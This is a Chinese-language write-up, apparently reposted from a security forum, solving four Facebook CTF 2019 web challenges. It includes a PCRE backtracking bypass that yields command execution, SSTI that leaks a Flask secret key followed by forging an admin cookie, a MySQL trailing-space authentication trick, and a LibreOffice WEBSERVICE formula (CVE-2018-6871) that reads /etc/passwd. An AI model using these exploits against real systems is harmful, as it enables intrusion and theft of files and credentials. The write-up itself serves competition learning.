Facebook CTF2019 - Web

2019-06-16 约 498 字 预计阅读 3 分钟

声明:本文 【Facebook CTF2019 - Web】 由作者 cru**** 于 2019-06-16 08:29:00 首发 先知社区 曾经 浏览数 104 次

感谢 cru**** 的辛苦付出!

rceservice

题目描述:

We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only let you run 'ls'

http://challenges.fbctf.com:8085

(This problem does not require any brute force or scanning.
We will ban your team if we detect brute force or scanning).

要求用json格式传送payload

我们尝试ls{"cmd":"ls"}

题目源码:

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

暴躁过滤,在线砍人
但是我们看到了preg_match,就会想到p神曾经提到的PRCE,利用如下的exp:

import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'

res = requests.post("http://challenges.fbctf.com:8085/", data={"cmd":payload})
print(res.text)

另一种方法,同样是preg_match的问题,由于它会努力去匹配第一行,所以我们可以利用多行的方法

尝试直接cat,但是返回了空白
我们返回去查看源代码:putenv('PATH=/home/rceservice/jail');,jail应用于当前环境,又根据题目描述的提示--“只允许执行ls命令”,即jail包含了执行ls的二进制文件,所以我们可以直接拉出cat的路径:"cmd": "/bin/cat /home/rceservice/flag"

注:Linux命令的位置:/bin,/usr/bin,默认都是全体用户使用,/sbin,/usr/sbin,默认root用户使用

events

题目描述:

I heard cookies and string formatting are safe in 2019?

http://challenges.fbctf.com:8083

(This problem does not require any brute force or scanning. We will ban your team if we detect brute force or scanning).

登录

观察cookie:

ImEi.XP5j-w.rHcMilGKzEg1FYfcEOR6iqa-B9A

似乎有三段,但加密方式未知,密钥未知
我们尝试提交数据,注意到有三个参数需要提交:

既然提示了cookiestring format,admin是未允许的状态,所以思路是篡改cookie,伪装为admin,继而拿到flag,通常有一个思路是:利用SSTI,获取密钥,然后重新签名生成cookie。所以如何利用SSTI呢?
通过一番尝试,三个参数中,event_important是可利用点

  • 我们输入__dict__,成功回显

  • 查找配置文件:__class__.__init__.__globals__[app].config

  • 于是进行签名

from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

@app.route('/')
def index():
    print(session_serializer.dumps("admin"))

index()

将得到的cookie去修改原user的cookie即可得到flag

products manager

题目给出了源码:

  • 在db.php中:
/*
INSERT INTO products VALUES('facebook', sha256(....), 'FLAG_HERE');
INSERT INTO products VALUES('messenger', sha256(....), ....);
INSERT INTO products VALUES('instagram', sha256(....), ....);
INSERT INTO products VALUES('whatsapp', sha256(....), ....);
INSERT INTO products VALUES('oculus-rift', sha256(....), ....);
*/

给出了表结构,且提示很明显,再看主页面:

三个功能,add是添加产品

view可以查询

我们再查看view.php:

if (isset($name) && $name !== ""
        && isset($secret) && $secret !== "") {
    if (check_name_secret($name, hash('sha256', $secret)) === false) {
      return "Incorrect name or secret, please try again";
    }
    $product = get_product($name);
    echo "<p>Product details:";
    echo "<ul><li>" . htmlentities($product['name']) . "</li>";
    echo "<li>" . htmlentities($product['description']) . "</li></ul></p>";

/db.php::check_name_secret源码如下:

function check_name_secret($name, $secret) {
  global $db;
  $valid = false;
  $statement = $db->prepare(
    "SELECT name FROM products WHERE name = ? AND secret = ?"
  );
  check_errors($statement);
  $statement->bind_param("ss", $name, $secret);
  check_errors($statement->execute());
  $res = $statement->get_result();
  check_errors($res);
  if ($res->fetch_assoc() !== null) {
    $valid = true;
  }
  $statement->close();
  return $valid;
}

/db.php::get_product源码如下:

function get_product($name) {
  global $db;
  $statement = $db->prepare(
    "SELECT name, description FROM products WHERE name = ?"
  );
  check_errors($statement);
  $statement->bind_param("s", $name);
  check_errors($statement->execute());
  $res = $statement->get_result();
  check_errors($res);
  $product = $res->fetch_assoc();
  $statement->close();
  return $product;
}

check的时候会将name和secret一并查询,但返回product时只查询name,所以此时便有了可利用点
这里涉及到mysql的一个问题,查询的时候将会忽略字符串尾部的空格

于是我们可以添加一个facebook尾部带n个空格的product,添加成功后再进行查询,便能得到flag

pdfme


只能上传.fods文件,在网上找了个:

<?xml version="1.0" encoding="UTF-8"?>
<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"  xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0"  xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"  xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0"  xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0"  xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0"  xmlns:xlink="http://www.w3.org/1999/xlink"  xmlns:dc="http://purl.org/dc/elements/1.1/"  xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0"  xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0"  xmlns:presentation="urn:oasis:names:tc:opendocument:xmlns:presentation:1.0"  xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0"  xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0"  xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0"  xmlns:math="http://www.w3.org/1998/Math/MathML"  xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0"  xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0"  xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0"  xmlns:ooo="http://openoffice.org/2004/office"  xmlns:ooow="http://openoffice.org/2004/writer"  xmlns:oooc="http://openoffice.org/2004/calc"  xmlns:dom="http://www.w3.org/2001/xml-events"  xmlns:xforms="http://www.w3.org/2002/xforms"  xmlns:xsd="http://www.w3.org/2001/XMLSchema"  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  xmlns:rpt="http://openoffice.org/2005/report"  xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2"  xmlns:xhtml="http://www.w3.org/1999/xhtml"  xmlns:grddl="http://www.w3.org/2003/g/data-view#"  xmlns:tableooo="http://openoffice.org/2009/table"  xmlns:drawooo="http://openoffice.org/2010/draw"  xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0"  xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0"  xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0"  xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0"  xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.spreadsheet">
    <office:body>
        <office:spreadsheet>
            <table:table table:name="1">
                <table:table-column/>
                <table:table-row>
                    <table:table-cell office:value-type="string" calcext:value-type="string">
                        <text:p>TEXT</text:p>
                    </table:table-cell>
                </table:table-row>
                <table:table-row></table:table-row>
            </table:table>
            <table:named-expressions/>
        </office:spreadsheet>
    </office:body>
</office:document>

他会渲染为pdf:


将pdf下载下来,利用exiftool查看文件信息:

注意到libreoffice,查找相关漏洞,最后落到了CVE-2018-6871,差不多是协议的问题:

For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.

In LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1

table:table-cell这一部分进行替换,改为:

<table:table-cell 
          table:formula="of:=COM.MICROSOFT.WEBSERVICE("/etc/passwd")" 
          office:value-type="string" 
          office:string-value="" 
          calcext:value-type="string">
       <text:p>#VALUE!</text:p>
     </table:table-cell>

得到:

根据给出的用户,于是我们尝试查询/home/libreoffice_admin/flag,最终读到flag

关键词:[‘安全技术’, ‘CTF’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now